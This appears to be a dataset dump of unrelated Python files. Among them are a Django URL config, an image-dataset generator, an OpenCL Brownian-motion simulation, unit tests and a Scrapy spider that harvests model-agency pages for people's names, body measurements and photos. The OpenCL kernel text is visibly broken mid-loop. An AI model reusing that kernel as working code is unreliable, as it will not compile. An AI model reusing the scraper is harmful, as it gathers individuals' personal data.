_shell.subcommands.keys()\n except SystemExit:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.assertEqual(0, exc_value.code)\n finally:\n out = sys.stdout.getvalue()\n sys.stdout.close()\n sys.stdout = orig\n\n return out\n\n\nclass ShellTest(ShellBase):\n def test_help_unknown_command(self):\n self.assertRaises(exc.CommandError, self.shell, 'help foofoo')\n\n def test_help(self):\n required = [\n '^usage: surveil',\n '(?m)^See \"surveil help COMMAND\" for help on a specific command',\n ]\n help_text = self.shell('help')\n for r in required:\n self.assertRegexpMatches(help_text, r)\n\n def test_help_on_subcommand(self):\n required = [\n '^usage: surveil config-host-list',\n \"(?m)^List all config hosts.\",\n ]\n argstrings = [\n 'help config-host-list',\n ]\n for argstr in argstrings:\n help_text = self.shell(argstr)\n for r in required:\n self.assertRegexpMatches(help_text, r)\n","sub_path":"surveilclient/tests/test_shell.py","file_name":"test_shell.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"266289779","text":"from django.conf.urls import url\nfrom django.conf import settings\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index'),\n # url(r'^(?P<pk>[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n url(r'^project/(?P<pk>[0-9]+)/$', views.ProjectView.as_view(), name='project'),\n url(r'^(?P<pk>[0-9]+)/results/$', views.ResultsView.as_view(), name='results'),\n url(r'^(?P<question_id>[0-9]+)/vote/$', views.vote, name='vote'),\n url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n\n url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {\n 'document_root': settings.STATIC_ROOT,\n }),\n]\n\n'''\n\nurlpatterns = [\n # ex: /polls/\n url(r'^$', views.index, name='index'),\n # ex: /polls/5/\n url(r'^(?P<question_id>[0-9]+)/$', views.detail, name='detail'),\n # ex: /polls/5/results/\n url(r'^(?P<question_id>[0-9]+)/results/$', views.results, name='results'),\n # ex: /polls/5/vote/\n url(r'^(?P<question_id>[0-9]+)/vote/$', views.vote, name='vote'),\n]\n'''","sub_path":"portfolio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"19263212","text":"import numpy as np\nimport h5py\nimport cv2\nimport utils\nimport time\nfrom skimage import io, color, transform\n\n\n###CONSTANTS\nfiledir = \"data/output/\"\nh5file = \"labprocessed224.hdf5\"\nseed_number = 42\nx_width = 256\nx_height = 256\n\ny_width = 64\ny_height = 64\n\n###\n\n# get the filenames of the training folder and shuffle them\nfilenames = utils.get_filenames(filedir, shuffle=True, seed_number=seed_number)\n\n\ndef my_generator(batch_size, filenames):\n \"\"\"Yield batches of images from img_folder\"\"\"\n\n counter = 0\n while True:\n X_batch = np.zeros((batch_size, x_width, x_height), dtype=float)\n Y_batch = np.zeros((batch_size, y_width, y_height, 2), dtype=float)\n\n # restart from the beginning once the next batch would run past the end\n if counter + batch_size > len(filenames):\n counter = 0\n for i in range(batch_size):\n # load the image from folder first, advancing through the file list\n # so that successive batches yield different images\n try:\n # print(train_dir+filenames[i])\n img = utils.rgb_to_lab(filedir + filenames[counter + i], img_dims = (x_width, x_height))\n y_img = transform.resize(img, (y_width, y_height))\n except Exception as e:\n print(\"Skipping file as found exception \\n {}\".format(e))\n continue\n X_batch[i] = img[:, :, 0]\n Y_batch[i] = y_img[:, :, 1:]\n X_batch = X_batch.reshape(X_batch.shape + (1,))\n Y_batch = Y_batch[:, :, :, :]\n yield (X_batch, Y_batch)\n counter += batch_size\n\n# Process and load to memory\n\nprint('[INFO] Generating the training data for {} samples...'.format(len(filenames)))\nstart = time.time()\n(Xtrain, Ytrain) = next(my_generator(len(filenames), filenames))\nprint('[INFO] Loading {} samples to memory took {} seconds'.format(len(Xtrain), time.time()-start))\n\n\nimport hickle\nprint(\"[INFO] Dumping to pickle file...\")\nstart = time.time()\nhickle.dump((Xtrain, Ytrain), open(\"data_processed/LAB_Train_Data_15k_256in_65out.hkl\", \"w\"))\nprint(\"[INFO] Dump completed in {} seconds\".format(time.time()-start))\n\n\n#(xtest, ytest) = pickle.load(open('data_processed/LAB_Train_Data.p', 'rb'))\n\n# print(len(xtest), len(ytest))\n\n# print(xtest[0])\n\nquit()\n\n# Open and save array to hdf5\nprint(\"[INFO] Dumping to hdf5 file...\")\nstart = time.time()\nwith h5py.File(h5file, 'w') as f:\n f.create_dataset('Xtrain', data=Xtrain)\n f.create_dataset('Ytrain', data=Ytrain)\nprint(\"[INFO] Dump completed in {} seconds\".format(time.time()-start))\n\nprint(\"[INFO] Opening and checking the data on the file...\")\nwith h5py.File(h5file, 'r') as f:\n 
print(f.keys())\n\nquit()","sub_path":"labDataset_generator.py","file_name":"labDataset_generator.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"642692694","text":"import webbrowser\nimport sys\nimport re\n\nchrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\n\n\ndef FindUrlInLine(str):\n url = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', str)\n return url\n\n\ndef main():\n if len(sys.argv) < 2:\n exit(0)\n file_name = sys.argv[1]\n with open(file_name) as f:\n lines = f.readlines()\n for line in lines:\n stringList = FindUrlInLine(line)\n for i in stringList:\n webbrowser.get(chrome_path).open(i)\n\n\nmain()\n\n","sub_path":"collectUrl.py","file_name":"collectUrl.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"554109930","text":"'''\nCreated on 02.02.2016\n\n@author: michael\n'''\n\nimport pyopencl as cl\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport struct\nctx=cl.create_some_context(True)\ncqu=cl.CommandQueue(ctx)\nmf=cl.mem_flags\nprg=\"\"\"\nfloat xorshift128p(__global ulong *ranstate1,__global ulong *ranstate2, int gid)\n{\n//random number generator\n//see xorshift128 documentation http://xorshift.di.unimi.it/xorshift128plus.c\nulong s1=ranstate2[gid];\nulong s0=ranstate1[gid];\nranstate1[gid]=s1;\ns1 ^=s1<<23;\nulong s2=s1 ^ s0 ^(s1>>18)^(s0>>5);\nranstate2[gid]=s2;\nreturn convert_float(s2+s0)/18446744073709551616.0;\n}\nfloat get_force(float pos,float alpha,float t,float tau)\n{\n if((t/tau)-floor(t/tau)<0.75){\n return 0;}\n float fp=pos-floor(pos);\n if(fp<0){\n fp+=1;}\n if(fp>alpha){\n return -1/(1-alpha);}\n return 1/alpha;\n}\n__kernel void timestep(__global float *pos,__global ulong *ranstate1,__global ulong *ranstate2,const float tdelta, const float alpha, const float D2, const float t,__global const float* tau,const int iters)\n{\nint gid = get_global_id(0);\nfloat posi=pos[gid];\nfloat taui=tau[gid];\nulong rs1=ranstate1[gid];\nulong rs2=ranstate2[gid];\nulong si=rs1;\nfloat r1=0;\nfloat r2=0;\nfloat z=0;\nfor(int i=0;i>18)^(si>>5);\nr1=convert_float(rs2+si)/18446744073709551616.0;\nsi=rs1;\nrs1=rs2;\nrs2^=rs2<<23;\nrs2=rs2^si^(rs2>>18)^(si>>5);\nr2=convert_float(rs2+si)/18446744073709551616.0;\nz=sqrt(-2*log(r1))*cos(2*M_PI_F*r2);\nposi=posi-get_force(posi,alpha,t+tdelta*i,taui)*tdelta+z*sqrt(D2*tdelta);\n}\npos[gid]=posi;\nranstate1[gid]=rs1;\nranstate2[gid]=rs2;\n}\n\"\"\"\ncprg=cl.Program(ctx,prg).build()\ndef get_pot1(pos,alpha,t,tau):\n if t/tau-int(t/tau)<3/4:\n return 0\n fp=pos-int(pos)\n if fp<0:\n fp+=1\n if fp>alpha:\n return (1-fp)/(1-alpha)\n else:\n return fp/alpha \ndef get_force1(pos,alpha,t,tau):\n if t/tau-int(t/tau)<3/4:\n return 0\n fp=pos-int(pos)\n if fp<0:\n fp+=1\n if fp>alpha:\n return -1/(1-alpha)\n return 1/alpha\ndef time_step(pos,tdelta,alpha,D2,t,tau):\n return pos-tdelta*get_force1(pos, alpha,t,tau)+np.sqrt(D2*tdelta)*random.gauss(0,1)\n\ndef checktimestep(tdelta,alpha,D2,tau):\n if tdelta*max(1/alpha,1/(1-alpha))+4*np.sqrt(D2*tdelta)>alpha/2:\n print(\"Warning: timestep might be too large\")\ndef run_simulation(pos,tdelta,alpha,D2,t0,tau,count):\n \"\"\"\n runs simulation on the cpu, to compare with the gpu result\n \"\"\"\n ret=np.zeros(count,dtype=np.float64)\n ret[0]=pos\n checktimestep(tdelta, alpha, D2, tau)\n for i in 
range(1,count):\n ret[i]=time_step(ret[i-1], tdelta, alpha, D2, t0+i*tdelta, tau)\n return ret\ndef grun_simulation(pos,tdelta,alpha,D2,t0,tau,count):\n return np.array([x[0] for x in gsimulate(np.array([pos],dtype=np.float32),tdelta,alpha,D2,t0,np.array([tau],dtype=np.float32),1,count)])\ndef gsimulate(pos,tdelta,alpha,D2,t0,tau,count,subcount):\n '''\n Simulate using the opencl device; the kernel is executed for each position/tau tuple count*subcount times, where count is the number of steps which are done without saving the result back to the host\n '''\n pos_g=cl.Buffer(ctx,mf.READ_WRITE|mf.COPY_HOST_PTR,hostbuf=pos)#creating position buffer\n tau_g=cl.Buffer(ctx,mf.READ_ONLY|mf.COPY_HOST_PTR,hostbuf=tau)#creating tau buffer\n ran1_h=np.array([random.getrandbits(64) for x in tau],dtype=np.uint64)#seeding the rng for each unit\n ran2_h=np.array([random.getrandbits(64) for x in tau],dtype=np.uint64)\n ran1_g=cl.Buffer(ctx,mf.READ_WRITE|mf.COPY_HOST_PTR,hostbuf=ran1_h)\n ran2_g=cl.Buffer(ctx,mf.READ_WRITE|mf.COPY_HOST_PTR,hostbuf=ran2_h)\n res=[np.empty_like(pos) for x in range(subcount)]\n for i in range(subcount):\n cprg.timestep(cqu,pos.shape,None,pos_g,ran1_g,ran2_g,struct.pack('f', tdelta),struct.pack('f', alpha),struct.pack('f', D2),struct.pack('f', t0+i*tdelta*count),tau_g,struct.pack('i', count))\n cl.enqueue_copy(cqu,res[i], pos_g)\n return res\ndef test_consistency():\n s1=random.getstate()\n val1ds=gsimulate(np.array([0.0],dtype=np.float32), 1e-3, 0.2, 0.02, 0, np.array([4.0],dtype=np.float32), 200, 1)[0]\n val1=val1ds[0]\n random.setstate(s1)\n val1s=gsimulate(np.array([0.0],dtype=np.float32), 1e-3, 0.2, 0.02, 0, np.array([4.0],dtype=np.float32), 1,200)[-1][0]\n assert val1==val1s\ntest_consistency()\ncount=800000\ntd=1e-3\ntau=10\ns1=run_simulation(0, td, 0.2, 0.2, 0, tau, count)\nprint(s1)\nplt.plot(range(count),s1)\nx=range(count)\nplt.plot(x,[(0 if (y*td/tau/1-int(y*td/tau/1)<3/4) else 1) for y in x ])\nplt.show()\ndef est_besttau():\n tcount=50\n tmult=100\n taup=np.linspace(0.01,100,tcount,dtype=np.float32)\n tau=np.repeat(taup,tmult, 0)\n pl=gsimulate(np.zeros((tcount*tmult,),dtype=np.float32), td, 0.2, 0.00065, 0, tau, count, 1)[-1]\n pls=np.zeros(tcount)\n plvar=np.zeros(tcount)\n for i in range(tcount):\n for j in range(tmult):\n pls[i]+=pl[i*tmult+j]\n plvar[i]+=pl[i*tmult+j]**2\n pls[i]/=tmult\n plvar[i]-=pls[i]**2\n plvar[i]/=tmult**2\n plvar[i]=np.sqrt(plvar[i])\n print(pls)\n plt.errorbar(taup,pls,yerr=plvar,fmt=\"b+\")\n print(\"maximum:%f, %f, %f\"%(taup[np.argmax(pls)],np.max(pls),plvar[np.argmax(pls)]))\n plt.show()\n return taup[np.argmax(pls)]\ntauop=est_besttau()\nprint(tauop)\nsystems=1000\ncount=800000\nsubcount=10\nres=gsimulate(np.zeros(systems,dtype=np.float32), td, 0.2, 0.00065, 0, np.ones((systems,), dtype=np.float32)*tauop, count, subcount)\nstd=np.zeros(subcount)\nposi=np.zeros(subcount)\nfor i in range(subcount):\n plt.plot(res[i],[random.random() for x in range(len(res[i]))],\"k+\")\n plt.show()\n std[i]=np.std(res[i])\n posi[i]=np.mean(res[i])\nplt.plot(range(subcount),std)\nplt.show()\nplt.plot(range(subcount),posi)\nplt.show()\n","sub_path":"brownian.py","file_name":"brownian.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"21578505","text":"import math\n\ndef euclidean_distance(train_data, test_data):\n\tprint(\"Should return the distance matrix between the test vector and the training vector\")\n\tprint(\"Number of rows: length of the test vector\")
\n\tprint(\"Number of columns: length of the training vector\")\n\n\tnumberColumns = len(train_data[0]) # computing the number of attributes per sample\n\tresult = []\n\taux = []\n\tacc = 0.0\n\tposition = 0\n\tposition_test = 0\n\tposition_column = 0\n\n\twhile(position < len(train_data)):\n\t\tprint(\"Position:\"+str(position))\n\t\twhile(position_test < len(test_data)):\n\t\t\twhile(position_column < numberColumns):\n\t\t\t\tacc = acc + (train_data[position][position_column] - test_data[position_test][position_column])**2\n\t\t\t\tprint(\"[\"+str(position)+\"][\"+str(position_column)+\"]\"+\" [\"+str(position_test)+\"][\"+str(position_column)+\"]\")\n\t\t\t\tposition_column = position_column + 1\n\t\t\tprint(math.sqrt(acc))\n\t\t\taux.append(math.sqrt(acc))\n\t\t\tacc = 0.0\n\t\t\tposition_test = position_test + 1\n\t\t\tposition_column = 0\n\n\t\tresult.append(aux)\n\t\taux = []\n\t\tposition = position + 1\n\t\tposition_test = 0\n\n\treturn result\n\n\n\n\n#print(euclidean_distance([[0,1,3],[2,4,5],[6,7,10]], [[11,12,13],[20,21,23],[40,50,60]]))\n","sub_path":"src/distance_calculator.py","file_name":"distance_calculator.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"200919091","text":"#!/usr/bin/python3\n\"\"\"Unittest module for the class State\n\"\"\"\nimport unittest\nimport datetime\nimport models\nfrom models.state import State\nimport os\n\n\nclass TestState(unittest.TestCase):\n \"\"\"Test methods for the class State\n \"\"\"\n def test_documentation(self):\n \"\"\"this checks the documentation\n of the module and the class\n \"\"\"\n self.assertIsNotNone(models.state.__doc__)\n self.assertIsNotNone(State.__doc__)\n\n def test_uniqueId(self):\n \"\"\"this checks that the instances\n that are created have unique ids\n \"\"\"\n instance1 = State()\n instance2 = State()\n self.assertNotEqual(instance1, instance2)\n self.assertNotEqual(instance1.id, instance2.id)\n\n def test_exec_permissions(self):\n \"\"\"Method that checks the file access permissions\n \"\"\"\n read = os.access('models/state.py', os.R_OK)\n self.assertTrue(read)\n write = os.access('models/state.py', os.W_OK)\n self.assertTrue(write)\n exect = os.access('models/state.py', os.X_OK)\n self.assertTrue(exect)\n\n def test_typeData(self):\n \"\"\"this method checks the types of\n the attributes when an instance is created\n \"\"\"\n instance1 = State()\n self.assertIsInstance(instance1.created_at, datetime.datetime)\n self.assertIsInstance(instance1.updated_at, datetime.datetime)\n self.assertIsInstance(instance1.id, str)\n self.assertIsInstance(instance1, State)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_models/test_state.py","file_name":"test_state.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"627225107","text":"def factorial(n):\n \"\"\"Returns the factorial of a number n\n >>> factorial(0)\n 1\n >>> factorial(6)\n 720\n \"\"\"\n if n == 0:\n return 1\n else:\n return n * factorial(n - 1)\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod(verbose=False)\n","sub_path":"simulaz/soluzioni/ESA_2017-18_simulazione_appello_1.py","file_name":"ESA_2017-18_simulazione_appello_1.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"513837209","text":"# -*- 
coding: utf-8 -*-\nimport os\nimport re\nimport scrapy\nimport json\nfrom urllib.parse import quote\nfrom scrapy.spiders import Spider\nimport sys\nsys.path.append(os.getcwd()+'/utils')\nfrom get_redundant import GetRedundant\nfrom html_container import sel_extractor\n\nclass Rus_c_8(Spider):\n\n name=\"Rus_sc_8\"\n def __init__(self, *args, **kwargs):\n self.start_urls=[args]\n self.util=GetRedundant()\n self.Selext = \"\"\n self.numbers = []\n self.pattern = re.compile(r'\\d{2,3}')\n self.same_num, self.same_name, self.same_img = True, True, True\n self.xpath_name, self.xpath_num, self.xpath_img = \"\", \"\", \"\"\n\n def start_requests(self):\n for URL in self.start_urls[0]:\n yield scrapy.Request(url=URL, callback=self.Spec8)\n\n def Spec8(self, response):\n ref=response.url\n print( \"\\n----------\"+response.url+\"----------\\n\" )\n \n name, img_src, num = \"\", \"\", \"\"\n\n if \"m-star68\" in ref:\n name = ref.split(\"/\")[-2].split(\"-\")\n name = \" \".join([e.capitalize() for e in name])\n self.xpath_img = '//div[@class=\"entry-content \"]/figure/img/@src'\n self.same_name, self.same_num = False, False\n\n elif \"models07\" in ref:\n self.xpath_name = '//h1[@class=\"pngfix\"]/text()'\n img = response.xpath('//@src').extract()\n i, go = 0, True\n while go and i < len(img):\n e = img[i]\n if \"images/resources\" in e:\n img_src = \"http://www.models07.ru\" + e.replace(\"/medium\", \"\")\n go = False \n i += 1\n self.xpath_img = '//div[@id=\"content\"]/p/text()'\n self.same_num = False\n\n elif \"ma-zhanna\" in ref:\n self.xpath_name = '//h1[@style=\"margin-bottom: 2px;\"]/text()'\n self.xpath_num = '//td[@valign=\"top\"]/text()'\n img_src, self.xpath_img = \"http://ma-zhanna.ru/\", '//a[@id=\"model_url\"]/@href'\n\n elif \"miss-mariel\" in ref:\n if \"item\" in ref:\n t = response.xpath('//h2[@class=\"itemTitle\"]/text()').extract_first()\n if len(t) > 0:\n name = t[0]\n self.xpath_num = '//span[@class=\"itemExtraFieldsValue\"]/text()'\n img_src, self.xpath_img = \"http://miss-mariel.com\", '//a[@class=\"modal\"]/@href'\n else:\n t = response.xpath('//h3[@id=\"jg_photo_title\"]/text()').extract_first()\n img = \"http://miss-mariel.com\" + response.xpath('//img[@class=\"jg_photo\"]/@src').extract_first()\n if len(img) > 22:\n img_src = img.replace( \"img&id\", \"orig&id\" )\n self.same_num, self.same_img = False, False\n if len(t) > 0:\n t = re.findall( r'\\w+ \\w+', t)\n name = t[0]\n self.same_name = False\n\n elif \"artmoda\" in ref:\n name = ref.split(\"/\")[-1].split(\"-\")[1:]\n name = \" \".join([e.capitalize() for e in name])\n self.xpath_num = '//span[@class=\"field-value\"]/text()'\n img_src, self.xpath_img = \"http://www.artmoda.by\", '//img[@class=\"attachment-full size-full\"]/@src'\n self.same_name = False\n\n elif \"avantmodels\" in ref:\n self.xpath_name = '//h3[@id=\"model_name\"]/text()'\n self.xpath_num = '//*[@class=\"model_param_value\"]/text()'\n self.xpath_img = '//*[@class=\"fancybox_thumbs\"]/@href'\n\n elif \"modusvivendis\" in ref:\n self.xpath_num = self.xpath_name = '//*[@class=\"portfolio-model-file clearfix\"]/div/text()'\n self.xpath_img = '//div/img/@src'\n\n elif \"yesmodels\" in ref:\n self.xpath_name = '//*[@style=\"font-size:34px;\"]/text()'\n self.xpath_num = '//*[@class=\"font_8\"]/text()'\n comp2, t_item = \".jpg\", \"\"\n for e in range(2):\n i, go = 0, True\n if e == 0:\n comp, Tag, t_string = \"simplebook\", \"iframe\", ref\n else:\n comp, Tag = \"userFiles\", \"img\"\n img = sel_extractor(t_string).htmlextractor(_tag=Tag, 
_atr=\"src\")\n while go and i < len(img):\n t_item = img[i]\n if comp in t_item or comp2 in t_item:\n t_string = t_item\n go = False \n i += 1\n img_src = t_item\n self.same_img = False\n\n elif \"nikmodelmanagement\" in ref:\n name = ref.split(\"/\")[-1].split(\"-\")\n if name == str:\n name = [name]\n name = \" \".join([e.capitalize() for e in name])\n num = response.xpath('//*[@style=\"font-style:italic;\"]/text()').extract()\n if len(num) > 2:\n num.pop(1)\n num += response.xpath('//*[@data-packed=\"true\"]/p/span/span/text()').extract()\n self.numbers = re.findall( r'\\d{2,3}', \" \".join(num))\n img = response.xpath('//img/@src').extract()\n i, go = 0, True\n while go and i < len(img):\n t_item = img[i]\n if \"fill\" in t_item and i != 0:\n img_src = t_item\n go = False \n i += 1\n if img_src != \"\":\n bad_str = re.findall(r'fill\\/(\\w_\\d+,h_\\d+)', img_src)\n if len(bad_str) > 0:\n img_src = img_src.replace(bad_str[0], \"w_930,h_640\")\n\n self.same_name, self.same_img, self.same_num = False, False, False\n\n elif \"aquarelle-models\" in ref:\n self.xpath_name = '//*[@class=\"title__text\"]/text()'\n self.xpath_num = '//*[@class=\"gallery__params\"]/span/text()'\n img_src, self.xpath_img = \"http://aquarelle-models.com\", '//*[@class=\"gallery__pictureLink\"]/@href'\n\n elif \"grace-models\" in ref:\n self.xpath_name = '//*[@class=\"model_title\"]/text()'\n self.xpath_num = '//*[@class=\"grace_model-property\"]/dl/dd/text()'\n img = response.xpath('//*[@class=\"grace_model-picture\"]/div/@style').extract_first()\n if len(img) > 0:\n t_item = re.findall( r'url\\(\\'\\.(.+)\\'\\)', img)\n img_src = \"http://www.grace-models.com\" + t_item[0]\n self.same_img = False\n\n elif \"forward-models\" in ref:\n name = ref.split(\"/\")[-2].split(\"-\")\n if name == str:\n name = [name]\n name = \" \".join([e.capitalize() for e in name])\n num = response.xpath('//td[@align=\"left\"]/small/text()').extract()\n if len(num) > 1:\n num.pop(-1)\n self.numbers = re.findall( r'\\d{2,3}', \" \".join(num))\n self.xpath_img = '//*[@class=\"attachment-medium_large size-medium_large\"]/@src'\n self.same_name, self.same_num = False, False\n\n elif \"lookmodels\" in ref:\n self.xpath_name = '//*[@class=\"data\"]/h1/text()'\n img_src, self.xpath_img = \"http://www.lookmodels.ru\", '//*[@class=\"photomodel\"]/img/@src'\n num = response.xpath('//li/text()').extract() \n if len(num) > 3:\n num = num[:-2]\n self.numbers = re.findall( r'\\d{2,3}', \" \".join(num))\n self.same_num = False\n\n elif \"ultramodels\" in ref:\n self.xpath_name = '//*[@class=\"modelBookName\"]/text()'\n num = response.xpath('//*[@class=\"modelBookSlideMeasurements\"]').extract()\n num = re.findall( r'\\d{2,3}', \" \".join(num))\n self.numbers.append(num[0])\n if len(num) > 0:\n self.numbers += num[1:7:2]\n img = sel_extractor(ref).htmlextractor(_class=\"portrait\", _atr=\"src\")\n i, go = 0, True\n while go and i < len(img):\n t_item = img[i]\n if \".jpg\" in t_item:\n img_src = t_item\n go = False\n i += 1\n self.same_img, self.same_num = False, False\n \n elif \"faces-one\" in ref:\n n = response.xpath('//*[@class=\"p_name\"]/text()').extract()\n if len(n) > 0:\n t_name = re.findall( r'\\w+', n[0])\n if len(t_name) > 0:\n name = t_name[0]\n img_src, self.xpath_img = \"http://www.faces-one.com\", '//*[@border=\"0\"]/@src'\n self.xpath_num = '//*[@class=\"value\"]/text()'\n self.same_name= False\n \n elif \"select\" in ref:\n t_name = ref.split(\"/\")[-1].replace(\".html\", \"\").split(\"_\")\n if len(t_name) > 0:\n name = \" 
\".join(t_name)\n self.xpath_num = '//*[@class=\"modelInfo info\"]/span/text()'\n t_item = \"http://select.agency\" + response.xpath('//*[@class=\"photo tall\"]/img/@src').extract_first()\n if len(t_item) > 20:\n img_src = t_item.replace(\"big_list_tall/\", \"\")\n self.same_name, self.same_img = False, False\n \n elif \"veronamodels\" in ref:\n self.xpath_name = '//*[@class=\"infotable\"]/h2/text()'\n t_num = response.xpath('//td/text()').extract()\n if len(t_num[-1]) == 2:\n t_num.pop(-1)\n self.numbers = re.findall( r'\\d{2,3}', \" \".join(t_num) )\n img_src, self.xpath_img = \"https://veronamodels.ru\", '//*[@class=\"fancy\"]/@href'\n self.same_num = False\n\n elif \"andyfiordmodels\" in ref:\n self.xpath_name = '//*[@class=\"profile-head__name\"]/text()'\n self.xpath_num = '//*[@class=\"m10s__val\"]/text()'\n t_image = response.xpath('//*[@class=\"picture__wrapper js-lightbox\"]/@data-lightbox').extract_first()\n if len(t_image):\n j = json.loads(t_image)\n img_src = \"http://andyfiordmodels.com\" + j[\"src\"]\n self.same_img = False\n\n elif \"tannmodelmanagement\" in ref:\n self.xpath_name = '//*[@class=\"blogpost\"]/h2/text()'\n self.xpath_img = '//*[@class=\"videocontainer\"]/img/@src'\n self.same_num = False\n\n# Passing paths\n\n if self.same_name == True:\n name = response.xpath(self.xpath_name).extract_first()\n if name == None:\n name = \"\"\n\n if self.same_num == True:\n num = response.xpath( self.xpath_num ).extract()\n if num != None:\n t = re.findall( r'\\d{2,}', \" \".join(num) )\n self.numbers = [e for e in t if len(e) < 4]\n\n if self.same_img == True:\n t = response.xpath(self.xpath_img).extract_first()\n if t != None:\n img_src += t\n elif \" \" in img_src:\n img_src = quote(img_src, safe = \"://\")\n else:\n img_src = \"\"\n \n while len(self.numbers) < 4:\n self.numbers.append(\"\")\n print( name, self.numbers[0:4], img_src )\n template = {\n \"Name\":name,\n \"Height\":self.numbers[0],\n \"Bust\":self.numbers[1],\n \"Waist\":self.numbers[2],\n \"Hip\":self.numbers[3],\n \"Url\":ref,\n \"Image\":img_src\n }\n # self.util.sending_template(in_template=template)\n self.util.store_item(data=[template])\n ","sub_path":"spiders/Russian/spec_rus/rus_sp_8.py","file_name":"rus_sp_8.py","file_ext":"py","file_size_in_byte":11440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"635689268","text":"\"\"\"\nCalculate 2D spatial correlation functions of density, current and orientation\nfileds.\n\n\n\"\"\"\n\nimport numpy as np\n\n\ndef corr2d(u, v=None):\n def autoCorr2d(f):\n F = np.fft.rfft2(f)\n corr = np.fft.irfft2(F * F.conj())\n return corr\n\n if v is None:\n res = autoCorr2d(u) / u.size\n else:\n res = (autoCorr2d(u) + autoCorr2d(v)) / u.size\n res = np.fft.fftshift(res)\n return res\n\n\ndef auto_corr2d(f):\n \"\"\" Calculate the auto-correlation of function f(x, y).\n\n Parameters:\n --------\n f: np.array\n n * n array\n Returns:\n --------\n h: np.array\n Unscaled auto-correlation function, where h[0, 0] is np.sum(f**2)\n \"\"\"\n F = np.fft.rfft2(f)\n h = np.fft.irfft2(F * F.conj())\n return h\n\n\ndef cal_corr(vx, vy, num, dA):\n mask = num > 0\n Jx = vx / dA\n Jy = vy / dA\n rho = num / dA\n module = np.zeros_like(Jx)\n module[mask] = np.sqrt(Jx[mask]**2 + Jy[mask]**2)\n ux = np.zeros_like(Jx)\n uy = np.zeros_like(Jy)\n ux[mask] = Jx[mask] / module[mask]\n uy[mask] = Jy[mask] / module[mask]\n valid_count = corr2d(mask)\n corr_rho = corr2d(rho)\n corr_J = corr2d(Jx, Jy) / valid_count\n corr_u = corr2d(ux, uy) 
/ valid_count\n return corr_rho, corr_J, corr_u\n\n\ndef cal_corr2d(num, vx, vy, vxm=None, vym=None, dA=None, normed_mode=1):\n \"\"\"\n calculate spatial correlation function of density and velocity.\n\n num: np.array\n 2d array of particle number in each grid.\n vx, vy: np.array\n 2d array of velocity in each grid.\n vxm, vym: float\n Mean values of vx, vy.\n dA: float\n Area of one grid.\n normed_mode: int\n The way to normalize correlation functions. Correlation functions is\n divided by 1) the size of input array or 2) the valid counts.\n \"\"\"\n\n rho = num / dA\n if normed_mode == 1:\n mask = num > 0\n valid_count = auto_corr2d(mask)\n elif normed_mode == 2:\n valid_count = auto_corr2d(num)\n else:\n valid_count = rho.size\n C_rho = np.fft.fftshift(auto_corr2d(rho) / valid_count)\n C_v = np.fft.fftshift((auto_corr2d(vx) + auto_corr2d(vy)) / valid_count)\n return C_rho, C_v\n\n\ndef spherical_averaging(corr, L, smoothed=False):\n \"\"\"\n Average correlation function spherically.\n\n Parameters:\n --------\n corr: 2d array\n 2d correlation function.\n L: int\n Size of the system.\n\n Returns:\n --------\n r: 1d array\n 1d array of radius.\n corr_r: 1d array\n Averaged correlation function along the radial direction.\n\n \"\"\"\n nRow, nCol = corr.shape\n dict_count = {}\n dict_cr = {}\n rr_max = ((min(nRow, nCol)) // 2)**2\n for row in range(nRow):\n dy = row - nRow // 2\n for col in range(nCol):\n dx = col - nCol // 2\n rr = dx * dx + dy * dy\n if rr < rr_max:\n if rr in dict_count.keys():\n dict_count[rr] += 1\n dict_cr[rr] += corr[row, col]\n else:\n dict_count[rr] = 1\n dict_cr[rr] = corr[row, col]\n rr_sorted = np.array(sorted(dict_count.keys()))\n r = np.sqrt(rr_sorted) * L / nRow\n corr_r = np.array([dict_cr[key] / dict_count[key] for key in rr_sorted])\n # corr_r /= corr_r[0]\n if smoothed is True:\n r_new, corr_new = [], []\n r_threshold = 10\n i = 0\n while i < r.size:\n if r[i] < 10:\n r_new.append(r[i])\n corr_new.append(corr_r[i])\n i += 1\n else:\n j = i + 1\n while j < r.size and r[j] < r_threshold + 1:\n j += 1\n r_new.append(np.mean(r[i:j]))\n corr_new.append(np.mean(corr_r[i:j]))\n i = j\n r_threshold += 1\n r_new = np.array(r_new)\n corr_new = np.array(corr_new)\n return r_new, corr_new\n else:\n return r, corr_r\n\n\ndef chara_length(r, c_r, threshold=0.5):\n j = -1\n for i in range(r.size):\n if c_r[i] > threshold and c_r[i + 1] <= threshold:\n j = i\n break\n if j < 0:\n Lc = 0\n else:\n Lc = r[j] - (c_r[j] - threshold) * (r[j] - r[j + 1]) / (\n c_r[j] - c_r[j + 1])\n 